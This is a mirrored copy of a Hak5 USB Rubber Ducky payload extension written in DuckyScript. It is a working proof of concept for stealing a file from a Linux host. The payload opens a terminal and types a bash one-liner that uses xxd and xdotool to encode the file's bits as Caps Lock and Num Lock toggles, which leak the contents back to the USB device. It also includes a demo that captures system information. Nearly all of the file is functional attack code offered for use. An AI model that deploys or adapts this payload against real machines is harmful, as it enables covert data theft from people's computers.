Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/extensions/linux_hid_exfil.txt
2968 views
1
EXTENSION LINUX_HID_EXFIL

2
    REM VERSION 1.1

3
    REM AUTHOR: Korben

4


5
    REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT

6


7
    REM_BLOCK DOCUMENTATION

8
        Helpers for Linux Keystroke Reflection data exfiltration

9
        This payload is a proof of concept for USB HID only Data Exfiltration

10


11
        TARGET:

12
            Linux host that supports opening terminal via CTRL ALT t, and xdotool

13


14
        USAGE:

15
            REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION

16
            Prepare data to exfil (in filename defined by TARGET_FILE below)

17
            with a terminal window already open - call RUN_LINUX_EXFIL()

18


19
        DEPLOYMENT:

20
            Plug Ducky into host, wait for the LED to turn (and stay) solid Green.

21
    END_REM

22


23
    REM CONFIGURATION:

24
    REM File on host machine to exfil using Keystroke Reflection attack

25
    DEFINE #TARGET_FILE filename.txt

26


27
    DEFINE #SAVE_AND_RESTORE_LOCKS TRUE

28
    DEFINE #ENABLE_EXFIL_LEDS TRUE

29
    DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE

30


31
    REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL()

32
    DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE

33


34
    FUNCTION RUN_LINUX_EXFIL()

35
        IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS

36
            LED_OFF

37
            $_EXFIL_LEDS_ENABLED = TRUE

38
        END_IF_DEFINED

39


40
        IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS

41
            SAVE_HOST_KEYBOARD_LOCK_STATE

42
        END_IF_DEFINED

43


44
        $_EXFIL_MODE_ENABLED = TRUE

45
        STRING_BASH

46
            c="xdotool key --delay 4";

47
            bs=$(xxd -b 

48
            #TARGET_FILE

49
            |cut -d" " -f2-7);

50
            for((i=0;i<${#bs};i++));do 

51
                b="${bs:$i:1}";

52
                if [[ "$b" == "0" ]];then 

53
                    c+=" Caps_Lock";

54
                fi;

55
                if [[ "$b" == "1" ]];then 

56
                    c+=" Num_Lock";

57
                fi;

58
            done;

59
            $c;

60
        END_STRING

61


62
        IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL

63
            STRING exit;

64
        END_IF_DEFINED

65


66
        ENTER

67


68
        REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one

69
        WAIT_FOR_EOF()

70


71
        $_EXFIL_MODE_ENABLED = FALSE

72


73
        IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS

74
            $_EXFIL_LEDS_ENABLED = FALSE

75
        END_IF_DEFINED

76


77
        IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS

78
            RESTORE_HOST_KEYBOARD_LOCK_STATE

79
        END_IF_DEFINED

80
    END_FUNCTION

81


82
    IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO

83
        REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.

84
        REM DEMO Boot Delay

85
        DELAY 3000

86
        REM Open Terminal

87
        CTRL ALT t

88
        DELAY 500

89
        REM Perpare some data in TARGET_FILE

90
        STRINGLN uname -a>#TARGET_FILE

91
        REM Exfil data to USB Rubber Ducky using Keystroke Reflection

92
        RUN_LINUX_EXFIL()

93
    END_IF_DEFINED

94
END_EXTENSION

95


96